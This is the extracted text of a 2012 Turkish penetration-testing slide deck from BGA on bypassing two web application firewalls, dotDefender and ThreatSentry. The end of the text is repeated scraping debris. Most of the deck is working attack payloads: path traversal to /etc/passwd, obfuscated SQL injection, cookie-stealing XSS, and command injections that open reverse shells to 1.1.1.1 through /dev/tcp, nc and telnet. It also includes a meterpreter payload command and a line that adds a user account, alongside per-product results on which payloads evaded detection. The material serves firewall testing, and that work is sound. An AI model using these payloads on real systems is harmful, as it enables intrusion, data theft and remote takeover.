Silo - Tips - Web Application Firewall Bypass PDF

(W)eb (A)pplication (F)irewall
Bypass
http://www.bga.com.tr
bilgi@bga.com.tr
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

Hakkımda
• Mehmet Dursun İnce ( @mmetince )
• Penetration Tester @BGA

• Vuln. Researcher @BGA
• mehmet.ince@bga.com.tr

WAF Nedir ?
• WAF nedir ?
Pentester
WAF + Web Sunucusu
Veri Tabanı Sistemi

Testler
• SQLi
• XSS
• LFI
• RCE
– Command Injection
– Code Execution
• Otomatize Tool’lar ve WAF.

DMZ
dotDefender MySQL
CentOS 5.x Centos 5.x
Pentester ModSecurity
CentOS 5.x
ThreadSentry Sql Server 2008

Windows Server 2003 Windows Server 2008

Payloads # File Inclusion
• ../
• ..%2F
• passwd
• ../config.php
• ..%2Fconfig.php
• /etc/passwd
• ../../../../../../../../../etc/passwd
• ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc..%
2Fpasswd
• php://filter/read=convert.base64-
encode/resource=[FILE]

Payloads # SQL Injection
• ‘a
• ' and '3'='3
• ‘ ) and ('1')=('1
• or 1=1
• and 1=1
• and 2>=1
• and 1924-23>=1920

Payloads # MySQL Injection
• and substring(@@version,1,1)>0
• and substring(version(),1,1)>0
• and SubsTRing(version(),1,1)>0
• union select 192,282,333—
• And sleep(5)
• union+select+null%2Cnull%2CLOAD_FILE('lfi.php'
)--
• /*!UniOn*/%20/*!SElecT*/+192,282,333--
• %23PTTmJopxdWJ%0AUNION%23PTTmJopxdWJ%
0ASeLEcT+null,null,version()--
Payloads # MsSQL Injection
• AND
UNICODE(SUBSTRING(@@SERVERNAME,1,1)) > 1
• %03AND%0CUNICODE%03(%03SUBSTRING%03(
%03@@SERVERNAME%03,%031,1%03))%03>%0
31
• %0DUNION%0DALL%0DSELECTNULL,NULL,@@SE
RVERNAME--
• IF(BINARY_CHECKSUM(7399)=BINARY_CHECKSU
M(7399)) WAITFOR DELAY '0:0:5';

Payloads # XSS
• <script>
• <script></script>
• javascript
• alert(1)
• prompt(1)
• alert(/BGA/)
• document.cookie
• <img srx=x:X onErroR=PromPt(document.cookie)//>
• <link rel=stylesheet
href=data:,*%7bx:expression(write(1))%7d

Payloads # XSS
• <input onfocus=write(1) autofocus>
• <video
onerror="javascript:alert(1)"><source></source></video>
• <body oninput=alert(1)><input autofocus>
• <frameset onload=alert(1)>
• <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKT
wvc2NyaXB0Pg=="></object>
• <embed
src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg=="></embed>
• <script>({})[$='\143\157\156\163\164\162\165\143\164\1
57\162'][$]('\141\154\145\162\164\50document.cookie\5
1')()</script>
Payloads # Command Injection
• 8.8.8.8 ; cat /etc/passwd

• 8.8.8.8 ; echo “selam” > a
• 8.8.8.8 ; cat ../config.php
• 8.8.8.8 && echo “selam” > a
• 8.8.8.8 && cat ../config.php
• 8.8.8.8 ; wget 1.1.1.1/mince.txt

Payloads # Command Injection
• 8.8.8.8 && telnet 127.0.0.1 4444 | /bin/bash

|telnet | telnet 127.0.0.1 8888
• 8.8.8.8 && mknod backpipe p && nc 1.1.1.1 4343

0<backpipe | /bin/bash 1>backpipe
• 8.8.8.8 && /bin/bash -i > /dev/tcp/1.1.1.1/4444

0<&1 2>&1

Payloads # Code Execution
• ./msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443
R | ./msfencode -e php/base64 -t raw

Applicure dotDefender
• «dotDefender is the perfect choice for

protecting your website and web applications
today.»
• http://www.applicure.com/

Applicure dotDefender
• Test Ortamı:
• CentOS 5.8 i386 sanal makine
• CentOS Full update
• Lisanslı dotDefender ve full update!

Applicure dotDefender – File Inclusion
• Input : ../config.php

• Input : /etc/passwd

• Input : ../../../../../../../../../etc/passwd
• WAF detected!
Saldırıyı engelleyen
kural.

• Input : php://filter/read=convert.base64-
encode/resource=/etc/passwd
• WAF trigger edilmedi

Applicure dotDefender – SQL Injection
• ‘a
• ' and '3'='3
Yeşil olan payload’lar WAF
• (‘ and ('1')=('1 tarafından engellenmeyen talepleri
ifade etmektedir!
• or 1=1
• and 1=1
• and 2>=1
• and 1924-23>=1920

Applicure dotDefender – MySQL Injection
• union select 1,2,3--
• union select 192,282,333
• And sleep(5)
• union+select+null%2Cnull%2CLOAD_FILE('lfi.php
')--
• /*!UniOn*/%20/*!SElecT*/+192,282,333--
• %23PTTmJopxdWJ%0AUNION%23PTTmJopxdWJ
%0ASeLEcT+3,null,version()

Applicure dotDefender – MsSQL Injection
• AND
UNICODE(SUBSTRING(@@SERVERNAME,1,1))
>1
• %03AND%0CUNICODE%03(%03SUBSTRING%0
3(%03@@SERVERNAME%03,%031,1%03))%0
3>%031
• %0DUNION%0DALL%0DSELECT%0DNULL,NUL
L,@@SERVERNAME
• IF(BINARY_CHECKSUM(7399)=BINARY_CHECK
SUM(7399)) WAITFOR DELAY '0:0:5';
Applicure dotDefender – MsSQL Injection
• Input =
UNION%0DALL%0DSELECT%0DNULL,NULL,@
@SERVERNAME
• WIN-UYB0EA2LDB6
Applicure dotDefender – XSS
• Input = <script>
• Waf Blocked!

• Input = alert()
• Waf Blocked!
• Input = prompt() 
• Input = <img src=bga

onerror=prompt(document.cookie)//>

• <img src=x:x
• <video
onerror="javascript:alert(1)"><source></sourc
e></video>
• <body oninput=prompt(1)><input autofocus>
• <frameset onload=prompt(1)>
• <object
data="data:text/html;base64,PHNjcmlwdD5hb
GVydCgxKTwvc2NyaXB0Pg=="></object>
• <embed
src="data:text/html;base64,PHNjcmlwdD5hbG
VydCgxKTwvc2NyaXB0Pg=="></embed>
• ({})[$='\143\157\156\163\164\162\165\143\
164\157\162'][$]('\141\154\145\162\164\50
document.cookie\51')()

Applicure dotDefender – Command Inj.
• Input = 8.8.8.8 ; cat /etc/passwd

• Input = 8.8.8.8 && /bin/bash -i >

/dev/tcp/1.1.1.1/4545 0<&1 2>&1
• WAF bypass!
• 8.8.8.8 ; cat /etc/passwd
• 8.8.8.8 ; echo “selam” > a
• 8.8.8.8 ; cat ../config.php
• 8.8.8.8 && echo “selam” > a
• 8.8.8.8 && cat ../config.php
• 8.8.8.8 ; wget 1.1.1.1/mince.txt
• 8.8.8.8 && telnet 127.0.0.1 4444 | /bin/bash |telnet |

telnet 127.0.0.1 8888
• 8.8.8.8 && mknod backpipe p && nc 1.1.1.1 4343

0<backpipe | /bin/bash 1>backpipe
• 8.8.8.8 && /bin/bash -i > /dev/tcp/1.1.1.1/8888 0<&1 2>&1

App. dotDefender – HTTP Header
• HTTP Header ile gönderilen bilgilerin WAF

tarafından incelenip incelenmediği test
edilmiştir.
• User-Agent
• Cookie
App. dotDefender – HTTP Header XSS
• User-Agent’i boş olan talepleri, dotDefender

saldırı olarak algılamaktadır.

App. dotDefender – HTTP Header XSS
• Cookie değişkeni dotDefender tarafından takip

edilmemektedir!
App. dotDefender – Cookie SQL Inj.
• dotDefender Cookie değişkeni üzerinde bir
inceleme yapmamaktadır. Bu nedenle cookie
üzerinden SQL Injection saldırıları kolaylıkla
gerçekleştirilebilir.

App. dotDefender – Web Scanners
• Default kurulumda Saniyede 200 talebi aşan

ip’leri 10 dakikalığına banlanmaktadır.

App. dotDefender – Netsparker
• Acunetix tüm zafiyetleri başarı ile tespit

etmiştir.

App. dotDefender – Acunetix
• Netsparker mssql.php üzerinde bulunan

MsSQL Injection zafiyeti haricinde ki tüm
zafiyetleri başarı ile tespit edebilmiştir.
Web Application Firewall & Intrusion Prevention Software for IIS
• ThreatSentry
• http://www.privacyware.com/intrusion_preve
ntion.html

ThreatSentry
• Test Ortamı:
• Windows Server 2003 32bit sanal makine
• Full Windows update
• Tüm özellikleri aktif, 30 günlük test sürümü.

ThreatSentry – File Inclusion
• Input : ../config.php

• Input : ../../../../../../../../../
• WAF tespit edemedi.

• Input : php://filter/read=convert.base64-
encode/resource=/etc/passwd
• WAF blocked!

ThreatSentry – SQL Injection
• ‘a
• ' and '3'='3
Yeşil olan payload’lar WAF
• (‘ and ('1')=('1 tarafından engellenmeyen talepleri
ifade etmektedir!
• or 1=1
• and 1=1
• and 2>=1
• and 1924-23>=1920

ThreatSentry – MySQL Injection
• union select 1,2,3--
• And sleep(5)
• union+select+null%2Cnull%2CLOAD_FILE('lfi.
php')--
• /*!UniOn*/%20/*!SElecT*/+192,282,333
• %23PTTmJopxdWJ%0AUNION%23PTTmJopxd
WJ%0ASeLEcT+3,null,version()
ThreatSentry – MsSQL Injection
• AND UNICODE(SUBSTRING(DB_NAME(),1,1)) >
1
• %03AND%0CUNICODE%03(%03SUBSTRING%0
3(%03DB_NAME()%03,%031,1%03))%03>%03
1
• %0DUNION%0DALL%0DSELECT%0DNULL,NUL
L,DB_NAME()
• IF(BINARY_CHECKSUM(7399)=BINARY_CHECK
SUM(7399)) WAITFOR DELAY '0:0:5';

ThreatSentry – MsSQL Injection
• Input =
UNION%0DALL%0DSELECT%0DNULL,NULL,DB
_NAME()
• waftest
ThreatSentry – XSS
• Input = <script>
• Waf Blocked!

ThreatSentry– XSS
• Input = <img src=x:x


ThreatSentry– XSS
• A
• Input = <body
oninput=prompt(document.cookie)><input
autofocus>
• <img src=x:x
• <video
onerror="javascript:alert(1)"><source></sourc
e></video>
• <body oninput=prompt(1)><input autofocus>
• <frameset onload=prompt(1)>
• <object
data="data:text/html;base64,PHNjcmlwdD5hb
GVydCgxKTwvc2NyaXB0Pg=="></object>
• <embed
src="data:text/html;base64,PHNjcmlwdD5hbG
VydCgxKTwvc2NyaXB0Pg=="></embed>
• ({})[$='\143\157\156\163\164\162\165\143\
164\157\162'][$]('\141\154\145\162\164\50
document.cookie\51')()

ThreatSentry – Command Inj.
• Cmd.exe /C dir
• nc.exe 123.123.123.123
• net user mince M1nc3 /add

ThreatSentry– HTTP Header XSS
• User-Agent değişkeni ThreatSentry tarafından

takip edilmemektedir!
ThreatSentry– Netsparker
• Netsparker tüm zafiyetleri başarı ile tespit

etmiştir.

ThreatSentry– Acunetix
• Acunetix tüm zafiyetleri başarı ile tespit

etmiştir.

Örnek Uygulama - 1

HTTP PARAMETER POLLUTION

Örnek Uygulama - 2

Teşekkürler
• 

Silo - Tips - Web Application Firewall Bypass PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Silo - Tips - Web Application Firewall Bypass PDF

Uploaded by

Copyright:

Available Formats

(W)eb (A)pplication (F)irewall

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Penetration Tester @BGA

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF + Web Sunucusu

Veri Tabanı Sistemi

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Otomatize Tool’lar ve WAF.

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

ThreadSentry Sql Server 2008

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• 8.8.8.8 ; cat /etc/passwd

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• 8.8.8.8 && telnet 127.0.0.1 4444 | /bin/bash

• 8.8.8.8 && mknod backpipe p && nc 1.1.1.1 4343

• 8.8.8.8 && /bin/bash -i > /dev/tcp/1.1.1.1/4444

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• «dotDefender is the perfect choice for

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Input = <img src=bga

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Input = 8.8.8.8 ; cat /etc/passwd

• Input = 8.8.8.8 && /bin/bash -i >

• 8.8.8.8 && telnet 127.0.0.1 4444 | /bin/bash |telnet |

• 8.8.8.8 && mknod backpipe p && nc 1.1.1.1 4343

• 8.8.8.8 && /bin/bash -i > /dev/tcp/1.1.1.1/8888 0<&1 2>&1

• HTTP Header ile gönderilen bilgilerin WAF

• User-Agent’i boş olan talepleri, dotDefender

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Cookie değişkeni dotDefender tarafından takip

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Default kurulumda Saniyede 200 talebi aşan

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Acunetix tüm zafiyetleri başarı ile tespit

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Netsparker mssql.php üzerinde bulunan

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• Input = <img src=x:x

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

• User-Agent değişkeni ThreatSentry tarafından